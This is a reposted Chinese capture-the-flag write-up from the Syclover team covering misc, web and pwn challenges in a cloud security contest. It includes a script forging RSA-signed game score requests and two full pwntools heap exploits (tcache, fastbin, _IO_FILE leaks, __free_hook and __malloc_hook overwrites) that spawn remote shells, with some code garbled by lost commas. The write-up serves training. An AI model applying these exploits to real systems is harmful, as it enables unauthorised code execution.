'数字安全'云安全公测大赛 Write-Up

admin 2023年5月31日09:41:20评论16 views字数 9952阅读33分10秒阅读模式


'数字安全'云安全公测大赛 Write-Up

  • misc

    • 签到

    • ewm

    • findme

  • web

    • gameapp

  • Pwn

    • amazon

    • fkroman


Misc

01

02

签到

 

签到题直接给了flag

02

ewm

  • solved by 0xPoker

Download Attachments

讨论区:
…好像就是一个二维码拼接一下

拼完了,逆向真难顶

'数字安全'云安全公测大赛 Write-Up

flag{g00d_g00d_study_1jf8988}


03

findme

  • solved by r1ngs

脚本如下:
二分查找法


#-*- coding=utf-8 -*-

from socket import *
import string
from re import *

def connect(host, port):
    s = socket()
    s.connect((host, port))
    return s

def i2h(num):
    return hex(num)[2:].rstrip('L')

def send(s, num):
    print s.recv(1024)
    print i2h(num)
    s.send(i2h(num))

def get_flag(s, bottom, top, g1, g2, count):
    for _ in range(count):
        print '======= try to get flag ========'
        send(s, bottom)
        send(s, top)

        g1 = g1+count
        send(s, g1)
        send(s, g1)
        print s.recv(1024)

def main():
    host ='121.40.216.20'
    port = 9999
    s = connect(host, port)

    bottom = 0
    top = 2**128

    block = abs(top-bottom)/3+1
    g1 = bottom
    g2 = block
    flag = 0
    tg1 = g1
    tg2 = g2
    for _ in range(200):
        if abs(g1-g2) < 10:
            get_flag(s, bottom, top, g1, g2, abs(g1-g2))
        send(s, bottom)
        send(s, top)

        send(s, g1)
        send(s, g2)

        mid = (g1+g2)/2
        remess = s.recv(1024)
        if remess == '1n'#in
            print 1
            flag = 1
            tg1 = g1
            tg2 = g2
            tmid = mid

            g2 = mid

        elif remess == '2n':
            print 2
            if flag == 1:
                g1 = tmid
                g2 = tg2
            else:
                g1 = g2
                g2 += block
        else:
            print remess
        print 'count'+str(_)
        print '+'*50



if __name__ == '__main__':
    main()

flag : flag{flag_server_boomboom_guess}


WEB

02

01

gameapp

  • solved by  evoA


我的伪造Java脚本

import org.junit.Test;
import org.springframework.util.Base64Utils;
import sun.misc.BASE64Decoder;

import javax.crypto.Cipher;
import java.security.Key;
import java.security.KeyFactory;
import java.security.interfaces.RSAPrivateKey;
import java.security.spec.PKCS8EncodedKeySpec;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class Test001 {
    private static Map<Integer, String> keyMap = new HashMap();

    @Test
    public void test001(){

    }
    @Test
    public  void private_encrypt()
            throws Exception
    
{

        String paramString = "{"op":"add","score":999}";
//        String paramString = "{"player":"evoA"}";
        keyMap.put(Integer.valueOf(0), "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqtXUIVoPUcBV1Wl3g8rGGNvMYnImonQdMC1Y8USwIwf7Y0GcBP/h6fAJPAS9//qYZzy8ZfDKH1+ezifFFCUTCCa/8anYFoms223okyzeTlUIRHbIkto1JxYOazbsE6+KmE+yJiij4839SYuC1KsLWT82uHEnA3Hau/DTzW4g4xhvzQIDAQAB");
        keyMap.put(Integer.valueOf(1), "MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBAKq1dQhWg9RwFXVanXeDysYY28xgiaidB0wLVjxRLAjB/tjQZwE/+Hp8Ak8BL3/+phnPLxl8MofX57OJ8nUUJRMIJr/xpgWiazbbeiTLN5OVQhEdsiS2jUnFg5rNuwTr4qYT7ImKKPjzf1Ji4LnUqwtZPza4cQDcdq78NPNbiDjGG/NAgMBAAECgYBUdazusCdPbxke09QI3Oq6VeuWncEiHHckx6Ml+p9Hwfu99/ZOpwDgUQSvZA3FTQ+PS3OpL0qs7USlDsXBe2F6gCZ/en1BvkEPE/FymHbzbSpr8BwjEel/kup842z11SujNxHbeznrXKNfvDlqR5HM7CurYEnrBW0X8She8lNAqXBXQJBANj3pPvSHFQ4ugkWst6XCX/gd5vQuvPzeUwHpReSdRsmnA6Jmv8oP03MQzjvsyrMoPatMzhN5Qtfpw12Febfl1pcCQQDJa2RGtK2jCiKxzKcbnUp9pPiSxtsdavneKoCG/tndICyGfeT1NRGSQsJCHIhxdee4QQYWUrzhbFBLLZDq4nsj07AkEAykt0T7si4MAXbPv2AKZQnCN9QhGHDof3k5UZL/ZFK+/wuY4Vyl+hJosHnz0XD5PFjNoGhLvUEBu6VUnBuAbHRtwJBAKysnHLhQlqbvdKfmEMcOf2HgP25rH5mn+ySk00n/q5LfuBt3XM54653/QGgZHigk96qIAXTOIooyU0p6yry8UTECQQCy8tufnlq8/8ISRdkHixENX+APeYr4hjmn5mUFJgB4qFUp1ReR0nA2oGf6IkzAWEwLvEchunKMtF7eEv1kHS+3Wd");
        Object localObject = org.apache.tomcat.util.codec.binary.Base64.decodeBase64((String)keyMap.get(Integer.valueOf(1)));
        localObject = (RSAPrivateKey) KeyFactory.getInstance("RSA").generatePrivate(new PKCS8EncodedKeySpec((byte[])localObject));
        Cipher localCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding");
        localCipher.init(1, (Key)localObject);
        byte[] res = Base64.getEncoder().encode(localCipher.doFinal(paramString.getBytes("UTF-8")));
        System.out.println(new String(res));
    }
}

pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">

    <modelVersion>4.0.0</modelVersion>

    <groupId>me.evoA.springboot001</groupId>
    <artifactId>springboot001</artifactId>
    <version>1.0-SNAPSHOT</version>
    <!-- 指定Spring Boot的版本 2.0.4.RELEASE -->
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.0.4.RELEASE</version>
    </parent>

    <dependencies>
        <!-- 导入Spirng Boot  web 所需的jar包 -->
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>junit</groupId>
            <artifactId>junit</artifactId>
            <version>4.12</version>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>net.sf.json-lib</groupId>
            <artifactId>json-lib</artifactId>
            <version>2.4</version>
            <scope>test</scope>
        </dependency>
    </dependencies>

</project>

PS: Content-Type必须是xxx 否则会失败
感觉题目要99999分 
com/ispring/gameplane/game/GameView.java 有个 addScore方法,json数据rsa加密发送,已经可以伪造 直接加999会被check,99通过
注意发一次替换一次cookie
替换cookie 就好了

import requests


rrr = requests.Session()
res = rrr.post(url="http://121.40.219.183:9999/score/",data="TWmIYQfp60aWjJH9kWjSB+OgWmyqiJJaGakyS1YXHcdpVzQVLoxC2/DBgFs19HGU8suk9togBAjGpM4KOvDbSh/yL+VEtg9LzSmaWdvMV6KM6NsXLKXdHhhDHwP/iOm1ceAkV9qBvs6jaPu4Luy1DxsF1FOynJFBAdAUpT+EQN0=",headers={"Content-Type":"xxx","cookie":"session=eyJwbGF5ZXIiOiJldm9BIiwic2NvcmUiOjQwMH0.XYRtdg.Y98UCi-ehTiQawFO2wclehVegVE"})
for i in range(1000):

    res = rrr.post(url="http://121.40.219.183:9999/score/",data="TWmIYQfp60aWjJH9kWjSB+OgWmyqiJJaGakyS1YXHcdpVzQVLoxC2/DBgFs19HGU8suk9togBAjGpM4KOvDbSh/yL+VEtg9LzSmaWdvMV6KM6NsXLKXdHhhDHwP/iOm1ceAkV9qBvs6jaPu4Luy1DxsF1FOynJFBAdAUpT+EQN0=",headers={"Content-Type":"xxx"})
    print(res.text)

'数字安全'云安全公测大赛 Write-Up


Pwn

03

01

amazon


  • solved by  骑麦兜看落日

利用 unsortedbin 合并然后利用 unsortedbin overlap 修改 tcache 表的 fd 位

修改 free_hook 为 system

覆盖 free_hook 使向上申请 覆盖 锁 为0

#!/usr/bin/python2.7  
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.arch = "amd64"

exe = './amazon'
elf = ELF(exe)

one = [0x4f2c50x4f3220x10a38c]

#------------------------------------
def d(s = ''):
    gdb.attach(p ,s)

def manu(idx):
    p.sendlineafter('choice: ', str(idx))

def add(num, size, note):
    manu(1)
    p.sendlineafter('buy: ', str(1))
    p.sendlineafter('many: ', str(num))
    p.sendlineafter('note: ', str(size))
    p.send(note)


def add1(num, size, note):
    manu(1)
    p.sendlineafter('buy: ', str(1))
    p.sendline(str(num))
    p.sendline(str(size))
    p.sendline(note)

def show():
    manu(2)

def checkout(idx):
    manu(3)
    p.sendlineafter('for: ', str(idx))

def pwn():
    add(20x80'a')  #0
    add(20xa0'A')  #1
    add(20x90'A')  #2
    add(20x10'A')  #4
    for i in range(8):
        checkout(0)

    for i in range(8):
        checkout(2)

    show()
    p.recvuntil('Name: ')
    libc.address = u64(p.recv(6).ljust(8'x00')) - 0x3ebca0
    success('libc.address--->'+hex(libc.address))
    for i in range(8):
        checkout(1)

    add(20x100'xff'*0x80 +p64(3)+p64(0xa1) + p64(libc.sym['__free_hook']-0x40))
    checkout(0)
    add(20xa0'a')
    add(20x100'xff'*0x80 +p64(3)+p64(0xa1) + '/bin/shx00')
    add(20xa0'x00'*0x20+p64(libc.sym['system']))
    #d()
    checkout(5)

    p.interactive()
#-------------------------------------
if __name__ == '__main__':
    l = 0
    if l:
        p = process(exe)
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    else:
        p = remote('121.41.38.38'9999)
        libc = ELF('libc-2.27.so')

    pwn()

02

fkroman

  • solved by  骑麦兜看落日

程序存在一个UAF和heap overflow,先通过fastbin attack打iofile leak出libc地址,然后再通过fastbin attack打malloc_hook来getshell

#!/usr/bin/env python2

from pwn import *
context(log_level='debug', arch='amd64', os='linux', terminal=['tmux''splitw''-h'])

exe = './fkroman'
lib = './libc-2.23.so'
ip = '121.40.246.48'
port = 9999
elf = ELF(exe)
libc = ELF(lib)


def dbg(script=''):
    attach(io, gdbscript=script)

def choice(idx):
    io.sendlineafter('Your choice: ', str(idx))

def index(idx):
    io.sendlineafter('Index: ', str(idx))

def add(idx, size):
    choice(1)
    index(idx)
    io.sendlineafter('Size: ', str(size))

def dele(idx):
    choice(3)
    index(idx)

def edit(idx, size, content):
    choice(4)
    index(idx)
    io.sendlineafter('Size: ', str(size))
    io.sendafter('Content: ', content)

# ------------------------------------------------
LOCAL = 0
iofile_off = 0x25dd
libc_off = 0x3c5600
onegadgets = [0x452160x4526a0xf02a40xf1147]
# ------------------------------------------------


def exp():
    add(00x70-8)
    add(10x70-8)
    add(20x90-8)
    add(30x20-8)

#-------------------leak libc---------------------
    dele(1)
    dele(0)
    dele(2)
    edit(01, p8(0xe0))
    edit(10x70'A'*0x68+p64(0x71))
    edit(22, p16(iofile_off))

    add(40x70-8)
    add(50x70-8)
    add(60x70-8)

    edit(60x54'A'*3+p64(0)*6+p64(0x00000000fbad1800)+p64(0)*3+'x00')

    io.recv(0x40)

    libc.address = u64(io.recv(8)) - libc_off
    log.info(hex(libc.address))

#-------------------malloc_hook-------------------
    add(70x70-8)
    edit(70x70'B'*0x68+p64(0x21))
    dele(7)
    edit(78, p64(libc.sym['__malloc_hook']-0x23))
    add(80x70-8)
    add(90x70-8)
    edit(90x1b'C'*0x13+p64(libc.address+onegadgets[1]))

    add(80)

    #dbg()

    io.interactive()


# ------------------------------------------------
if __name__ == '__main__':

    if LOCAL:
        io = elf.process()#env={"LD_PRELOAD": libc.path})
    else:
        io = remote(ip, port)

    exp()


'数字安全'云安全公测大赛 Write-Up
'数字安全'云安全公测大赛 Write-Up

三叶草小组

新浪微博:@三叶草小组Syclover


在与你相遇的路上马不停蹄~


'数字安全'云安全公测大赛 Write-Up



原文始发于微信公众号(三叶草小组Syclover):'数字安全'云安全公测大赛 Write-Up

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月31日09:41:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   '数字安全'云安全公测大赛 Write-Uphttps://cn-sec.com/archives/948299.html

发表评论

匿名网友 填写信息